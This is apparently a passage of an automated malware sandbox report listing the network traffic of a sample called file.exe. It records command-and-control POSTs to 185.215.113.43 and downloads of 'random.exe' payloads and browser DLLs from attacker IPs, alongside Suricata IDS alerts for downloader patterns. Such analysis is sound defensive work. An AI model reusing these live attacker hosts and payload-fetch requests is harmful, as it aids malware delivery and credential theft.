                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 46 37 37 42 38 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B52F77B85882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 46 37 37 42 38 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B52F77B85882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 46 37 37 42 38 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B52F77B85882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 46 37 37 42 38 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B52F77B85882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 46 37 37 42 38 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B52F77B85882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 35 32 46 37 37 42 38 35 38 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77B52F77B85882D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                          Source: global trafficHTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49745 -> 31.41.244.11:80
                          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49763 -> 31.41.244.11:80
                          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49789 -> 185.215.113.16:80
                          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49814 -> 185.215.113.16:80
                          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49840 -> 185.215.113.16:80
                          Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49848 -> 185.215.113.206:80
                          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49877 -> 31.41.244.11:80
                          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49917 -> 31.41.244.11:80
                          Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49916 -> 185.215.113.206:80
                          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49946 -> 31.41.244.11:80
                          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49966 -> 31.41.244.11:80
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49977 -> 104.21.35.43:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49987 -> 104.21.35.43:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49986 -> 172.67.139.78:443
                          Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:50259 -> 185.215.113.16:80
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50256 -> 172.67.139.78:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50257 -> 104.21.35.43:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50273 -> 104.21.35.43:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50294 -> 104.21.35.43:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50323 -> 104.21.35.43:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50351 -> 172.67.139.78:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50367 -> 172.67.139.78:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50376 -> 104.21.35.43:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50384 -> 104.21.35.43:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50345 -> 104.21.35.43:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50382 -> 172.67.139.78:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50413 -> 172.67.139.78:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50396 -> 172.67.139.78:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50448 -> 172.67.139.78:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50458 -> 172.67.139.78:443
                          Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.43
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: unknownTCP traffic detected without corresponding DNS query: 31.41.244.11
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F3E0C0 recv,recv,recv,recv,0_2_00F3E0C0
                          Source: global trafficHTTP traffic detected: GET /detct0r HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0Host: zonedw.sbsConnection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQjcvc0BCJDKzQEIucrNAQii0c0BCIrTzQEIntbNAQin2M0BCPnA1BUY9snNARi60s0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                          Source: global trafficHTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                          Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQjcvc0BCJDKzQEIucrNAQii0c0BCIrTzQEIntbNAQin2M0BCPnA1BUY9snNARi60s0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                          Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                          Source: global trafficHTTP traffic detected: GET /1t8nM4.torrent HTTP/1.1Referer: BEGINUser-Agent: BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86Host: iplogger.coCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /detct0r HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cacheCookie: stel_ssid=4325bdd3d696776e18_8917033688022161950
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0Host: zonedw.sbsConnection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQjcvc0BCJDKzQEIucrNAQii0c0BCIrTzQEIntbNAQin2M0BCPnA1BUY9snNARi60s0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                          Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQjcvc0BCJDKzQEIucrNAQii0c0BCIrTzQEIntbNAQin2M0BCPnA1BUY9snNARi60s0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                          Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                          Source: global trafficHTTP traffic detected: GET /1t8nM4.torrent HTTP/1.1Referer: ENDUser-Agent: BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86Host: iplogger.coCache-Control: no-cacheCookie: 56521988137264061=3; clhf03028ja=8.46.123.189
                          Source: global trafficHTTP traffic detected: GET /files/encoxx/random.exe HTTP/1.1Host: 31.41.244.11
                          Source: global trafficHTTP traffic detected: GET /files/hell911/random.exe HTTP/1.1Host: 31.41.244.11
                          Source: global trafficHTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
                          Source: global trafficHTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
                          Source: global trafficHTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /files/unique2/random.exe HTTP/1.1Host: 31.41.244.11
                          Source: global trafficHTTP traffic detected: GET /files/burpin1/random.exe HTTP/1.1Host: 31.41.244.11
                          Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /files/fate/random.exe HTTP/1.1Host: 31.41.244.11
                          Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /files/7850253564/4ZD5C3i.exe HTTP/1.1Host: 31.41.244.11
                          Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /add?substr=mixtwo&s=three&sub=emp HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /dll/key HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /dll/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /files/encoxx/random.exe HTTP/1.1Host: 31.41.244.11If-Modified-Since: Thu, 12 Dec 2024 07:55:00 GMTIf-None-Match: "675a96d4-60200"
                          Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /files/download HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: CHost: 80.82.65.70Connection: Keep-AliveCache-Control: no-cache
